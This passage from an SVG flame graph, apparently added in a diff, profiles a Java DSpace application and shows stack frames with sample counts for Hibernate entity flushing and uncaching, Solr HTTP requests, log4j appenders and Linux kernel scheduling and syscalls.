+<text  x="506.99" y="863.5" >_..</text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/FormBodyPart:::&lt;init&gt; (1 samples, 0.15%)</title><rect x="943.9" y="533" width="1.7" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="946.88" y="543.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (5 samples, 0.74%)</title><rect x="1167.3" y="421" width="8.7" height="15.0" fill="rgb(58,207,58)" rx="2" ry="2" />
+<text  x="1170.31" y="431.5" ></text>
+</g>
+<g >
+<title>java/nio/charset/Charset:::lookup (1 samples, 0.15%)</title><rect x="1163.8" y="501" width="1.8" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="1166.82" y="511.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (13 samples, 1.92%)</title><rect x="329.4" y="885" width="22.7" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="332.44" y="895.5" >e..</text>
+</g>
+<g >
+<title>[libjvm.so] (372 samples, 55.03%)</title><rect x="528.4" y="885" width="649.4" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="531.43" y="895.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (18 samples, 2.66%)</title><rect x="854.9" y="501" width="31.4" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="857.85" y="511.5" >or..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (7 samples, 1.04%)</title><rect x="828.7" y="453" width="12.2" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="831.67" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadeStyle:::hasOrphanDelete (1 samples, 0.15%)</title><rect x="813.0" y="453" width="1.7" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="815.96" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (11 samples, 1.63%)</title><rect x="823.4" y="469" width="19.2" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="826.43" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (1 samples, 0.15%)</title><rect x="697.8" y="421" width="1.7" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="700.75" y="431.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (34 samples, 5.03%)</title><rect x="44.9" y="869" width="59.4" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="47.91" y="879.5" >do_sys..</text>
+</g>
+<g >
+<title>tcp_rcv_established (2 samples, 0.30%)</title><rect x="512.7" y="501" width="3.5" height="15.0" fill="rgb(239,108,108)" rx="2" ry="2" />
+<text  x="515.72" y="511.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.15%)</title><rect x="289.3" y="789" width="1.7" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="292.29" y="799.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultEvictEventListener:::doEvict (1 samples, 0.15%)</title><rect x="528.4" y="469" width="1.8" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="531.43" y="479.5" ></text>
+</g>
+<g >
+<title>hrtimer_start_range_ns (1 samples, 0.15%)</title><rect x="10.0" y="805" width="1.7" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="13.00" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (6 samples, 0.89%)</title><rect x="1165.6" y="517" width="10.4" height="15.0" fill="rgb(82,229,82)" rx="2" ry="2" />
+<text  x="1168.56" y="527.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (36 samples, 5.33%)</title><rect x="849.6" y="549" width="62.9" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="852.62" y="559.5" >sun/re..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (1 samples, 0.15%)</title><rect x="833.9" y="437" width="1.8" height="15.0" fill="rgb(93,240,93)" rx="2" ry="2" />
+<text  x="836.91" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="261" width="1.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="241.67" y="271.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (7 samples, 1.04%)</title><rect x="1163.8" y="549" width="12.2" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="1166.82" y="559.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.15%)</title><rect x="703.0" y="517" width="1.7" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="705.99" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (1 samples, 0.15%)</title><rect x="542.4" y="469" width="1.7" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="545.40" y="479.5" ></text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (13 samples, 1.92%)</title><rect x="329.4" y="901" width="22.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="332.44" y="911.5" >p..</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadEntity (2 samples, 0.30%)</title><rect x="912.5" y="421" width="3.4" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="915.46" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::doWriteTo (2 samples, 0.30%)</title><rect x="954.3" y="373" width="3.5" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="957.35" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/BasicLoader:::postInstantiate (1 samples, 0.15%)</title><rect x="1052.1" y="501" width="1.7" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="1055.10" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.15%)</title><rect x="703.0" y="533" width="1.7" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="705.99" y="543.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (4 samples, 0.59%)</title><rect x="352.1" y="757" width="7.0" height="15.0" fill="rgb(248,121,121)" rx="2" ry="2" />
+<text  x="355.13" y="767.5" ></text>
+</g>
+<g >
+<title>do_mprotect_pkey (2 samples, 0.30%)</title><rect x="360.9" y="757" width="3.4" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="363.86" y="767.5" ></text>
+</g>
+<g >
+<title>JVM_IHashCode (1 samples, 0.15%)</title><rect x="919.4" y="453" width="1.8" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="922.44" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (2 samples, 0.30%)</title><rect x="533.7" y="437" width="3.5" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="536.67" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (3 samples, 0.44%)</title><rect x="945.6" y="421" width="5.3" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="948.62" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1052.1" y="437" width="1.7" height="15.0" fill="rgb(252,127,127)" rx="2" ry="2" />
+<text  x="1055.10" y="447.5" ></text>
+</g>
+<g >
+<title>__x64_sys_sendto (14 samples, 2.07%)</title><rect x="504.0" y="869" width="24.4" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="506.99" y="879.5" >_..</text>
+</g>
+<g >
+<title>java/lang/Throwable:::printStackTrace (1 samples, 0.15%)</title><rect x="950.9" y="325" width="1.7" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="953.86" y="335.5" ></text>
+</g>
+<g >
+<title>call_stub (3 samples, 0.44%)</title><rect x="266.6" y="789" width="5.2" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="269.60" y="799.5" ></text>
+</g>
+<g >
+<title>_raw_spin_unlock_irq (1 samples, 0.15%)</title><rect x="102.5" y="757" width="1.8" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="105.51" y="767.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.15%)</title><rect x="287.5" y="885" width="1.8" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="290.54" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 1.04%)</title><rect x="1177.8" y="885" width="12.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1180.78" y="895.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (17 samples, 2.51%)</title><rect x="11.7" y="773" width="29.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="14.75" y="783.5" >fi..</text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="266.6" y="885" width="5.2" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="269.60" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingConnection:::prepareStatement (1 samples, 0.15%)</title><rect x="940.4" y="469" width="1.7" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="943.38" y="479.5" ></text>
+</g>
+<g >
+<title>__schedule (34 samples, 5.03%)</title><rect x="44.9" y="789" width="59.4" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="47.91" y="799.5" >__sche..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (5 samples, 0.74%)</title><rect x="943.9" y="549" width="8.7" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="946.88" y="559.5" ></text>
+</g>
+<g >
+<title>__x64_sys_mprotect (2 samples, 0.30%)</title><rect x="360.9" y="773" width="3.4" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="363.86" y="783.5" ></text>
+</g>
+<g >
+<title>__audit_syscall_exit (1 samples, 0.15%)</title><rect x="469.1" y="837" width="1.7" height="15.0" fill="rgb(226,87,87)" rx="2" ry="2" />
+<text  x="472.08" y="847.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.15%)</title><rect x="947.4" y="261" width="1.7" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="950.37" y="271.5" ></text>
+</g>
+<g >
+<title>tcp_v4_do_rcv (2 samples, 0.30%)</title><rect x="512.7" y="517" width="3.5" height="15.0" fill="rgb(235,102,102)" rx="2" ry="2" />
+<text  x="515.72" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (2 samples, 0.30%)</title><rect x="912.5" y="565" width="3.4" height="15.0" fill="rgb(69,218,69)" rx="2" ry="2" />
+<text  x="915.46" y="575.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::applyBeanPostProcessorsBeforeInitialization (2 samples, 0.30%)</title><rect x="1148.1" y="469" width="3.5" height="15.0" fill="rgb(94,241,94)" rx="2" ry="2" />
+<text  x="1151.11" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (7 samples, 1.04%)</title><rect x="895.0" y="485" width="12.2" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="898.00" y="495.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1167.3" y="133" width="1.8" height="15.0" fill="rgb(221,80,80)" rx="2" ry="2" />
+<text  x="1170.31" y="143.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (3 samples, 0.44%)</title><rect x="842.6" y="453" width="5.3" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="845.63" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (3 samples, 0.44%)</title><rect x="945.6" y="357" width="5.3" height="15.0" fill="rgb(107,253,107)" rx="2" ry="2" />
+<text  x="948.62" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/AppenderSkeleton:::doAppend (1 samples, 0.15%)</title><rect x="950.9" y="405" width="1.7" height="15.0" fill="rgb(104,250,104)" rx="2" ry="2" />
+<text  x="953.86" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (1 samples, 0.15%)</title><rect x="647.1" y="453" width="1.8" height="15.0" fill="rgb(72,221,72)" rx="2" ry="2" />
+<text  x="650.13" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (1 samples, 0.15%)</title><rect x="544.1" y="453" width="1.8" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="547.14" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="359.1" y="821" width="1.8" height="15.0" fill="rgb(202,54,54)" rx="2" ry="2" />
+<text  x="362.11" y="831.5" ></text>
+</g>
+<g >
+<title>__usb_hcd_giveback_urb (1 samples, 0.15%)</title><rect x="1113.2" y="341" width="1.7" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1116.20" y="351.5" ></text>
+</g>
+<g >
+<title>call_stub (372 samples, 55.03%)</title><rect x="528.4" y="837" width="649.4" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="531.43" y="847.5" >call_stub</text>
+</g>
+<g >
+<title>native_write_msr (4 samples, 0.59%)</title><rect x="352.1" y="725" width="7.0" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="355.13" y="735.5" ></text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (1 samples, 0.15%)</title><rect x="1167.3" y="165" width="1.8" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="1170.31" y="175.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="940.4" y="437" width="1.7" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="943.38" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::getCollectionEntry (1 samples, 0.15%)</title><rect x="811.2" y="453" width="1.8" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="814.21" y="463.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (56 samples, 8.28%)</title><rect x="367.8" y="853" width="97.8" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="370.84" y="863.5" >__x64_sys_f..</text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/sql/BasicExtractor:::extract (1 samples, 0.15%)</title><rect x="914.2" y="341" width="1.7" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="917.20" y="351.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (18 samples, 2.66%)</title><rect x="292.8" y="869" width="31.4" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="295.78" y="879.5" >do..</text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="236.9" y="613" width="5.3" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="239.92" y="623.5" ></text>
+</g>
+<g >
+<title>__x64_sys_write (1 samples, 0.15%)</title><rect x="917.7" y="341" width="1.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="920.69" y="351.5" ></text>
+</g>
+<g >
+<title>schedule (8 samples, 1.18%)</title><rect x="271.8" y="805" width="14.0" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="274.83" y="815.5" ></text>
+</g>
+<g >
+<title>Interpreter (372 samples, 55.03%)</title><rect x="528.4" y="741" width="649.4" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="531.43" y="751.5" >Interpreter</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadCollection (1 samples, 0.15%)</title><rect x="942.1" y="485" width="1.8" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="945.13" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (3 samples, 0.44%)</title><rect x="982.3" y="517" width="5.2" height="15.0" fill="rgb(105,251,105)" rx="2" ry="2" />
+<text  x="985.28" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.15%)</title><rect x="935.1" y="453" width="1.8" height="15.0" fill="rgb(56,205,56)" rx="2" ry="2" />
+<text  x="938.15" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::hydrate (1 samples, 0.15%)</title><rect x="942.1" y="437" width="1.8" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="945.13" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (8 samples, 1.18%)</title><rect x="1120.2" y="453" width="13.9" height="15.0" fill="rgb(67,215,67)" rx="2" ry="2" />
+<text  x="1123.18" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="853" width="1.7" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="292.29" y="863.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::writeBytes (1 samples, 0.15%)</title><rect x="917.7" y="437" width="1.7" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="920.69" y="447.5" ></text>
+</g>
+<g >
+<title>ctx_sched_in (2 samples, 0.30%)</title><rect x="495.3" y="693" width="3.5" height="15.0" fill="rgb(208,63,63)" rx="2" ry="2" />
+<text  x="498.27" y="703.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (1 samples, 0.15%)</title><rect x="917.7" y="533" width="1.7" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="920.69" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (10 samples, 1.48%)</title><rect x="573.8" y="453" width="17.5" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="576.82" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (1 samples, 0.15%)</title><rect x="950.9" y="357" width="1.7" height="15.0" fill="rgb(90,236,90)" rx="2" ry="2" />
+<text  x="953.86" y="367.5" ></text>
+</g>
+<g >
+<title>com/sun/proxy/$Proxy40:::isDirty (10 samples, 1.48%)</title><rect x="573.8" y="533" width="17.5" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="576.82" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/sql/TimestampTypeDescriptor$2:::doExtract (1 samples, 0.15%)</title><rect x="914.2" y="325" width="1.7" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="917.20" y="335.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::setOwner (1 samples, 0.15%)</title><rect x="898.5" y="453" width="1.7" height="15.0" fill="rgb(93,240,93)" rx="2" ry="2" />
+<text  x="901.49" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (1 samples, 0.15%)</title><rect x="528.4" y="453" width="1.8" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="531.43" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::toArray (1 samples, 0.15%)</title><rect x="936.9" y="501" width="1.7" height="15.0" fill="rgb(107,253,107)" rx="2" ry="2" />
+<text  x="939.89" y="511.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.15%)</title><rect x="514.5" y="421" width="1.7" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="517.47" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (1 samples, 0.15%)</title><rect x="1146.4" y="437" width="1.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="1149.36" y="447.5" ></text>
+</g>
+<g >
+<title>__x86_indirect_thunk_rax (1 samples, 0.15%)</title><rect x="500.5" y="901" width="1.7" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="503.50" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/XML:::escape (2 samples, 0.30%)</title><rect x="961.3" y="421" width="3.5" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="964.33" y="431.5" ></text>
+</g>
+<g >
+<title>net_rx_action (6 samples, 0.89%)</title><rect x="511.0" y="629" width="10.4" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="513.98" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (2 samples, 0.30%)</title><rect x="966.6" y="469" width="3.5" height="15.0" fill="rgb(80,228,80)" rx="2" ry="2" />
+<text  x="969.57" y="479.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%)</title><rect x="563.3" y="421" width="1.8" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="566.34" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadataFirstValue (1 samples, 0.15%)</title><rect x="933.4" y="389" width="1.7" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="936.40" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1167.3" y="277" width="1.8" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="1170.31" y="287.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/HibernateDBConnection:::uncacheEntity (220 samples, 32.54%)</title><rect x="528.4" y="581" width="384.1" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="531.43" y="591.5" >org/dspace/core/HibernateDBConnection:::uncacheEntity</text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (10 samples, 1.48%)</title><rect x="573.8" y="501" width="17.5" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="576.82" y="511.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="327.7" y="837" width="1.7" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="330.69" y="847.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::propertySelectFragmentFragment (1 samples, 0.15%)</title><rect x="1053.8" y="421" width="1.8" height="15.0" fill="rgb(78,226,78)" rx="2" ry="2" />
+<text  x="1056.85" y="431.5" ></text>
+</g>
+<g >
+<title>ipv4_conntrack_defrag (1 samples, 0.15%)</title><rect x="516.2" y="549" width="1.8" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="519.21" y="559.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (15 samples, 2.22%)</title><rect x="797.2" y="485" width="26.2" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="800.25" y="495.5" >o..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="421" width="3.5" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="241.67" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="966.6" y="341" width="1.7" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="969.57" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.15%)</title><rect x="772.8" y="453" width="1.8" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="775.81" y="463.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (16 samples, 2.37%)</title><rect x="13.5" y="741" width="27.9" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="16.49" y="751.5" >_..</text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.15%)</title><rect x="1109.7" y="437" width="1.7" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="1112.70" y="447.5" ></text>
+</g>
+<g >
+<title>start_thread (3 samples, 0.44%)</title><rect x="266.6" y="917" width="5.2" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="269.60" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::append (1 samples, 0.15%)</title><rect x="917.7" y="501" width="1.7" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="920.69" y="511.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (79 samples, 11.69%)</title><rect x="106.0" y="885" width="137.9" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="109.01" y="895.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (40 samples, 5.92%)</title><rect x="715.2" y="469" width="69.8" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="718.21" y="479.5" >org/hib..</text>
+</g>
+<g >
+<title>__schedule (12 samples, 1.78%)</title><rect x="243.9" y="789" width="21.0" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="246.91" y="799.5" ></text>
+</g>
+<g >
+<title>enqueue_hrtimer (1 samples, 0.15%)</title><rect x="10.0" y="789" width="1.7" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="13.00" y="799.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultDirtyCheckEventListener:::onDirtyCheck (15 samples, 2.22%)</title><rect x="823.4" y="501" width="26.2" height="15.0" fill="rgb(55,204,55)" rx="2" ry="2" />
+<text  x="826.43" y="511.5" >o..</text>
+</g>
+<g >
+<title>native_write_msr (12 samples, 1.78%)</title><rect x="474.3" y="677" width="21.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="477.32" y="687.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (9 samples, 1.33%)</title><rect x="1032.9" y="453" width="15.7" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="1035.90" y="463.5" ></text>
+</g>
+<g >
+<title>ip_rcv (6 samples, 0.89%)</title><rect x="511.0" y="581" width="10.4" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="513.98" y="591.5" ></text>
+</g>
+<g >
+<title>schedule (18 samples, 2.66%)</title><rect x="11.7" y="805" width="31.5" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="14.75" y="815.5" >sc..</text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="1066.1" y="389" width="1.7" height="15.0" fill="rgb(206,58,58)" rx="2" ry="2" />
+<text  x="1069.07" y="399.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (83 samples, 12.28%)</title><rect x="704.7" y="533" width="144.9" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="707.73" y="543.5" >sun/reflect/Genera..</text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::isStale (2 samples, 0.30%)</title><rect x="966.6" y="453" width="3.5" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="969.57" y="463.5" ></text>
+</g>
+<g >
+<title>perf_event_update_userpage (1 samples, 0.15%)</title><rect x="460.4" y="677" width="1.7" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="463.36" y="687.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (4 samples, 0.59%)</title><rect x="352.1" y="741" width="7.0" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="355.13" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getDelegate (2 samples, 0.30%)</title><rect x="961.3" y="501" width="3.5" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="964.33" y="511.5" ></text>
+</g>
+<g >
